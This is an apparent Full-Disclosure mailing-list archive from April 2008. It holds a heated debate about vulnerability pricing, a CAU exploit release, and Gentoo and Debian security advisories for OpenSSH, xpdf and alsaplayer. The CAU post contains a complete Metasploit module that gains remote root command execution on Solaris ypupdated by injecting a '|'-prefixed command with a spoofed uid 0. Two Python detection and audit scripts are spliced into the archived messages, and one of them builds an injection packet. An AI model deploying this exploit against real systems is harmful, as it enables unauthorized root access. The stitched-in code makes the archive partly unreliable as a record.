> > feel free to take that as a todo item. however, i would think it would
> > depend on the bo.
> >
> > > We can't dress up cash prizes/contests as something else as well, if a
> > > website is offering a $5,000 reward for a vulnerability, we need to
> > > know if we're being ripped off with the cash reward and how much can
> > > be potentially made after its sold on.
> >
> > zdi doesn't sell their exploits afaik.
> >
> > > Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> > > vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> > > reward might not be enough money, compared to what a vulnerability
> > > *should* be worth, and taking into consideration how much profit
> > > CanSecWest make overall from people attending the conference.
> >
> > the pwn2own cash is supplied by zdi. that's what you aren't realizing.
> >
> > > So you take into consideration how much a vulnerability should be
> > > worth, then the added worth because its a security conference of how
> > > much should be added on to counter the profit being made by the event.
> >
> > you already said this. twice.
> >
> > > However, to round off, we can't allow the mailing lists to turn into a
> > > vulnerability market place, full-disclosure should be for free stuff,
> > > and other websites and mailing lists can be setup for *money making
> > > schemes and auctions*.
> >
> > there are. however how are the people going to know about the websites if
> > you don't allow people to 'spam' lists with this sort of thing, mr
> > unofficial-fd moderator?
> >
> > > We shouldn't allow the money makers directly to market X... if a link
> > > is put on Full-Disclosure by a member of the public on the fly then
> > > thats ok, but I think its cheeky for the particular conference,
> > > contest runner or software trainer to be on the list themselves
> > > spamming everyone, for a profiteering agenda.
> >
> > that's why its called free enterprise, it's an unmoderated list. feel free
> > to unsubscribe if you dont like it much..
> >
> > > You mention cross-posting, thats not the issue here, its the people
> > > making the money posting to make the money that offends me so much.
> >
> > we know, its the third time youve said it in one email.
> >
> > > And not even the lonely hacker offends me who posts i've got a
> > > vulnerability for sale for X, I don't mind that on Full-Disclosure,
> > > but what I do mind is if its a company or organisation doing it that
> > > is directly the ones making the money via vulnerability for sale,
> > > prize contest, security conference or train to use our software!!!,
> > > thats the height of spam I just think is utterly wrong and unethical
> > > on any scale of acceptability.
> >
> > again, free market, and you are directly talking about zdi.
> >
> > > If a lonely hacker who works in a supermarket has a vulnerability to
> > > sell i'm all for it being post on full-disclosure, but not the big
> > > money conferences, prize hacking contests and software training guys.
> >
> > fourth time.
> >
> > > I come under the bracket as supermarket worker with nothing much going
> > > for me in life, so I should be allowed to sell a vulnerability on
> > > what's meant to be a mailing list for non-profit disclosure.
> >
> > you work at a supermarket? so you know about the under cash drawer switch
> > that pops open the drawer exploit?
> >
> > > You will find it easy to shout me down and say n3td3v's an idiot, but
> > > wait to the vulnerability market really takes off and the prices of
> > > vulnerabilities are properly defined and regulated, you're going to
> > > see a huge increase in commercial spam on the mailing lists, like the
> > > full-disclosure mailing list. so we've got to define what's fair play
> > > e-mail and what's a company or organisation blatantly profiteering
> > > with X method of extracting money out of people and using skilled
> > > hackers to make money, and to promote a security conference, training
> > > etc.
> >
> > again, unmoderated list. the door is over there.
>
> * i * * never * mentioned * ZDI * you * complete * jerk * off *
>
> * read * * the * * e-mail * properly * and * you * will * understand *
> what * I * don't * like *
>
> Overview:
>
> FIRST
>
> I said let's have a debate about how much a vulnerability is worth per
> vulnerability type, so everyone knows if we're being ripped off by joe
> jobs and to stop any blackmarkets, prices need to be defined and
> regulated, so everyone knows where they stand in the security
> community as far as prices are concerned.
>
> ^^^^You bypassed this completely.
>
> SECOND
>
> Those on the list who don't disclose a vulnerability *but* are trying
> to sell a product should be outlawed.
>
> ^^^^do you know the difference between disclosure and profiteering?
>
> You're losing my rag and the lack of intellectual debate on this from
> non-retards is shocking, these are two serious topics that need
> debating and all i've got is some lamer called "Ureleet" trying to
> wind me up.
>
> Is there anyone who can have a serious debate on this list?
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From druid at caughq.org  Sat Apr  5 02:39:37 2008
From: druid at caughq.org (I)ruid)
Date: Fri, 04 Apr 2008 20:39:37 -0500
Subject: [Full-disclosure] CAU-EX-2008-0001: Solaris ypupdated Command Execution
Message-ID: <1207359577.3155.29.camel@localhost>

                     Computer Academic Underground
                         http://www.caughq.org
                             Exploit Code

===============/========================================================
Exploit ID:      CAU-EX-2008-0001
Release Date:    2008.04.04
Title:           ypupdated_exec.rb
Description:     Solaris ypupdated Command Execution
Tested:          Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes:      Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL:     http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email:    I)ruid
===============/========================================================

Description
===========

This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request. Extra commands
may be launched through this command shell, which runs as root on the
remote host, by passing commands in the format '|'.

Credits
=======

Josh D. from Avalon Security Research is credited with originally
discovering this vulnerability. This Metasploit exploit module was
modeled after kcope's exploit released to Milw0rm on 2008.03.20.
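As an added detection-side example (not part of the CAU advisory or the Metasploit module), the decoder below parses an RPCv2 CALL for program 100028 (ypupdated), pulls the claimed AUTH_UNIX identity and the mapname argument, and flags a mapname that begins with '|', the request shape the advisory describes. The procedure numbers 1..4 and the ypupdate_args layout (mapname string first, then key and datum opaques) are assumptions from ypupdate_prot; the packets are constructed here for the demo.

```python
"""Flag ypupdated (RPC program 100028) update calls whose mapname starts
with '|'. Added example; sample packets are constructed below."""
import struct

YPUPDATED_PROG = 100028
RPC_CALL = 0
AUTH_UNIX = 1
# ypupdate_prot procedure numbers (assumption): all take mapname first.
UPDATE_PROCS = {1: "YPU_CHANGE", 2: "YPU_INSERT", 3: "YPU_DELETE", 4: "YPU_STORE"}
SHELL_METACHARS = set("|;&$`\n")


def xdr_opaque(data: bytes) -> bytes:
    """XDR variable-length opaque: 4-byte length, data, zero pad to 4."""
    return struct.pack(">I", len(data)) + data + b"\x00" * ((-len(data)) % 4)


def xdr_string(text: str) -> bytes:
    return xdr_opaque(text.encode())


class XdrReader:
    """Bounds-checked reader for big-endian XDR fields."""

    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def u32(self) -> int:
        if self.pos + 4 > len(self.buf):
            raise ValueError("truncated XDR u32")
        (value,) = struct.unpack_from(">I", self.buf, self.pos)
        self.pos += 4
        return value

    def opaque(self) -> bytes:
        length = self.u32()
        end = self.pos + length + ((-length) % 4)
        if end > len(self.buf):
            raise ValueError("truncated XDR opaque")
        data = self.buf[self.pos:self.pos + length]
        self.pos = end
        return data


def build_ypupdate_call(xid: int, mapname: str, hostname="localhost",
                        uid=0, gid=0, proc=1) -> bytes:
    """Constructed RPCv2 CALL (UDP, no record mark) with an AUTH_UNIX
    credential and ypupdate_args {mapname, key, datum}. key/datum are the
    2-byte 'x\\0' blobs the module's XDR.encode(..., 2, 0x78000000, ...)
    produces."""
    cred_body = (struct.pack(">I", 0) + xdr_string(hostname)   # stamp, machine name
                 + struct.pack(">III", uid, gid, 0))          # uid, gid, no extra gids
    header = struct.pack(">IIIIII", xid, RPC_CALL, 2, YPUPDATED_PROG, 1, proc)
    cred = struct.pack(">I", AUTH_UNIX) + xdr_opaque(cred_body)
    verf = struct.pack(">II", 0, 0)                           # AUTH_NULL, empty body
    args = xdr_string(mapname) + xdr_opaque(b"x\x00") + xdr_opaque(b"x\x00")
    return header + cred + verf + args


def inspect_rpc_call(packet: bytes):
    """Decode one RPC CALL. Returns None unless it is a ypupdated update
    procedure; otherwise the decoded fields plus a 'suspicious' verdict.
    Raises ValueError on truncated input."""
    r = XdrReader(packet)
    xid, msg_type, rpcvers, prog, vers, proc = (r.u32() for _ in range(6))
    if msg_type != RPC_CALL or rpcvers != 2 or prog != YPUPDATED_PROG:
        return None
    cred_flavor, cred_body = r.u32(), r.opaque()
    r.u32()                                                   # verifier flavor
    r.opaque()                                                # verifier body
    if proc not in UPDATE_PROCS:
        return None
    claimed_uid = claimed_host = None
    if cred_flavor == AUTH_UNIX:      # identity the client merely asserts, never verified
        c = XdrReader(cred_body)
        c.u32()                                               # stamp
        claimed_host = c.opaque().decode(errors="replace")
        claimed_uid = c.u32()
    mapname = r.opaque().decode(errors="replace")
    return {
        "xid": xid,
        "version": vers,
        "procedure": UPDATE_PROCS[proc],
        "claimed_host": claimed_host,
        "claimed_uid": claimed_uid,
        "mapname": mapname,
        # A NIS map name is never shell syntax: a leading '|' is exactly the
        # shape the advisory describes; other metacharacters are a weaker signal.
        "suspicious": mapname.startswith("|") or bool(SHELL_METACHARS & set(mapname)),
    }


if __name__ == "__main__":
    for pkt in (build_ypupdate_call(1, "passwd.byname", uid=100),
                build_ypupdate_call(2, "|uname -a")):
        print(inspect_rpc_call(pkt))
```

A UDP capture filter for portmapper-assigned ypupdated ports would feed each datagram to inspect_rpc_call; the claimed uid 0 with a '|' mapname is the pairing to alert on.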
References
==========

http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
http://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282

Metasploit
==========

require 'msf/core'

module Msf

class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote

	include Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris ypupdated Command Execution',
			'Description'    => %q{
				This exploit targets a weakness in the way the ypupdated RPC
				application uses the command shell when handling a MAP UPDATE
				request. Extra commands may be launched through this command
				shell, which runs as root on the remote host, by passing
				commands in the format '|'. Vulnerable systems include Solaris
				2.7, 8, 9, and 10, when ypupdated is started with the '-i'
				command-line option.
			},
			'Author'         => [ 'I)ruid ' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4498 $',
			'References'     =>
				[
					['BID', '1749'],
					['CVE', '1999-0209'],
					['OSVDB', '11517'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					['Automatic', { }],
				],
			'DefaultTarget'  => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class)
	end

	def exploit
		hostname  = datastore['HOSTNAME']
		program   = 100028   # ypupdated
		progver   = 1
		procedure = 1        # MAP UPDATE

		print_status 'Sending PortMap request for ypupdated program'
		pport = sunrpc_create('udp', program, progver)

		print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
		print_status 'Waiting for response...'
		# AUTH_UNIX credential; ypupdated trusts the uid/gid the client asserts
		sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
		command = '|' + payload.encoded
		msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
		sunrpc_call(procedure, msg)
		sunrpc_destroy

		print_good 'No Errors, appears to have succeeded!'
	rescue ::Rex::Proto::SunRPC::RPCTimeout
		# $! is an exception object; String#+ needs a String, hence .to_s
		print_status 'Warning: ' + $!.to_s
		print_status 'Exploit may or may not have succeeded.'
	end

end
end

--
I)ruid, C²ISSP
druid at caughq.org
http://druid.caughq.org

Attachment: ypupdated_exec.rb (application/x-ruby, 2199 bytes)
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/3543ef27/attachment.bin

From rbu at gentoo.org  Sat Apr  5 13:53:20 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Sat, 5 Apr 2008 14:53:20 +0200
Subject: [Full-disclosure] [ GLSA 200804-03 ] OpenSSH: Privilege escalation
Message-ID: <200804051453.20737.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200804-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenSSH: Privilege escalation
      Date: April 05, 2008
      Bugs: #214985, #215702
        ID: 200804-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two flaws have been discovered in OpenSSH which could allow local
attackers to escalate their privileges.

Background
==========

OpenSSH is a complete SSH protocol implementation that includes an SFTP
client and server support.
Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  net-misc/openssh      < 4.7_p1-r6                    >= 4.7_p1-r6

Description
===========

Two issues have been discovered in OpenSSH:

* Timo Juhani Lindfors discovered that OpenSSH sets the DISPLAY variable
  in SSH sessions using X11 forwarding even when it cannot bind the X11
  server to a local port in all address families (CVE-2008-1483).

* OpenSSH will execute the contents of the ".ssh/rc" file even when the
  "ForceCommand" directive is enabled in the global sshd_config
  (CVE-2008-1657).

Impact
======

A local attacker could exploit the first vulnerability to hijack
forwarded X11 sessions of other users and possibly execute code with
their privileges, disclose sensitive data or cause a Denial of Service,
by binding a local X11 server to a port using only one address family.
The second vulnerability might allow local attackers to bypass intended
security restrictions and execute commands other than those specified by
"ForceCommand" if they are able to write to their home directory.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenSSH users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/openssh-4.7_p1-r6"

References
==========

  [ 1 ] CVE-2008-1483
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1483
  [ 2 ] CVE-2008-1657
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1657

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us.
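As an added audit helper (not part of the GLSA), the script below parses an sshd_config, resolves the effective ForceCommand per user and lists the accounts that also carry a ~/.ssh/rc, the combination CVE-2008-1657 concerns on an unpatched sshd. Only "Match User" blocks with exact user names are evaluated (an assumption of this example; Group/Address criteria are skipped), and the sample config and home directories are constructed in a temporary directory.

```python
"""List users restricted by ForceCommand who also have a ~/.ssh/rc.
Added example with a constructed sshd_config and home tree."""
import os
import shutil
import tempfile


def parse_sshd_config(text):
    """Split sshd_config into global options and ordered Match blocks.
    Keys are lowercased; within a scope the first occurrence of a keyword
    wins, as in sshd itself."""
    global_opts, blocks, scope = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, *rest = line.split(None, 1)
        key, value = key.lower(), (rest[0].strip() if rest else "")
        if key == "match":
            toks = value.split()
            criteria = {toks[i].lower(): set(toks[i + 1].split(","))
                        for i in range(0, len(toks) - 1, 2)}
            scope = {}
            blocks.append((criteria, scope))
        else:
            (global_opts if scope is None else scope).setdefault(key, value)
    return global_opts, blocks


def forced_command_for(user, global_opts, blocks):
    """Effective ForceCommand for `user`: the first matching Match block
    that sets it, else the global value, else None. Only 'Match User'
    criteria are evaluated (assumption); other blocks are skipped, so a
    None result is a lower bound, not proof that no command is forced."""
    for criteria, opts in blocks:
        if set(criteria) != {"user"}:
            continue
        if user in criteria["user"] and "forcecommand" in opts:
            return opts["forcecommand"]
    return global_opts.get("forcecommand")


def users_with_rc_under_forcecommand(config_text, homes):
    """homes: {username: home_dir}. Returns the sorted users whose session
    is ForceCommand-restricted yet whose ~/.ssh/rc exists; on a vulnerable
    sshd that rc runs before the forced command."""
    global_opts, blocks = parse_sshd_config(config_text)
    exposed = []
    for user, home in homes.items():
        if forced_command_for(user, global_opts, blocks) is None:
            continue
        if os.path.isfile(os.path.join(home, ".ssh", "rc")):
            exposed.append(user)
    return sorted(exposed)


SAMPLE_CONFIG = """\
# constructed sample sshd_config, not from the advisory
PasswordAuthentication no
Match User backup,mirror
    ForceCommand /usr/bin/rrsync -ro /srv/backup
Match User git
    ForceCommand /usr/bin/git-shell
"""


def demo():
    """Build a throw-away home tree and run the audit against it."""
    root = tempfile.mkdtemp()
    try:
        homes = {u: os.path.join(root, u) for u in ("backup", "git", "alice")}
        for home in homes.values():
            os.makedirs(os.path.join(home, ".ssh"))
        for u in ("backup", "alice"):     # alice has an rc but no forced command
            with open(os.path.join(homes[u], ".ssh", "rc"), "w") as fh:
                fh.write("#!/bin/sh\necho rc ran\n")
        return users_with_rc_under_forcecommand(SAMPLE_CONFIG, homes)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())   # ['backup']
```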
Any security concerns should be addressed to security at gentoo.org or
alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From devin at debian.org  Wed Apr  2 22:25:32 2008
From: devin at debian.org (Devin Carraway)
Date: Wed, 02 Apr 2008 23:25:32 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1537-1] New xpdf packages fix multiple vulnerabilities
Message-ID:

------------------------------------------------------------------------
Debian Security Advisory DSA-1537-1                  security at debian.org
http://www.debian.org/security/                             Devin Carraway
April 02, 2008                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : xpdf
Vulnerability  : multiple
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-4352 CVE-2007-5392 CVE-2007-5393

Alin Rad Pop (Secunia) discovered a number of vulnerabilities in xpdf, a
set of tools for display and conversion of Portable Document Format (PDF)
files. The Common Vulnerabilities and Exposures project identifies the
following three problems:

CVE-2007-4352

    Inadequate DCT stream validation allows an attacker to corrupt memory
    and potentially execute arbitrary code by supplying a maliciously
    crafted PDF file.

CVE-2007-5392

    An integer overflow vulnerability in DCT stream handling could allow
    an attacker to overflow a heap buffer, enabling the execution of
    arbitrary code.
CVE-2007-5393

    A buffer overflow vulnerability in xpdf's CCITT image compression
    handlers allows overflow on the heap, allowing an attacker to execute
    arbitrary code by supplying a maliciously crafted CCITTFaxDecode
    filter.

For the stable distribution (etch), these problems have been fixed in
version 3.01-9.1+etch2.

For the unstable distribution (sid), these problems have been fixed in
version 3.02-1.3.

We recommend that you upgrade your xpdf packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Stable updates are available for amd64, arm, hppa, i386, ia64, mips,
mipsel, powerpc, s390 and sparc.
These files will probably be moved into the stable distribution on
its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From devin at debian.org  Fri Apr  4 21:27:22 2008
From: devin at debian.org (Devin Carraway)
Date: Fri, 4 Apr 2008 22:27:22 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1538-1] New alsaplayer packages fix arbitrary code execution
Message-ID: <20080404202722.407F7326A99@morgana.loeki.tv>

------------------------------------------------------------------------
Debian Security Advisory DSA-1538-1                  security at debian.org
http://www.debian.org/security/                             Devin Carraway
April 04, 2008                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : alsaplayer
Vulnerability  : buffer overrun
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-5301
Debian Bug     : 446034

Erik Sjölund discovered a buffer overflow vulnerability in the Ogg
Vorbis input plugin of the alsaplayer audio playback application.
Successful exploitation of this vulnerability through the opening of a
maliciously-crafted Vorbis file could lead to the execution of arbitrary
code.

For the stable distribution (etch), the problem has been fixed in
version 0.99.76-9+etch1.

For the unstable distribution (sid), the problem was fixed in version
0.99.80~rc4-1.

We recommend that you upgrade your alsaplayer packages.
Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.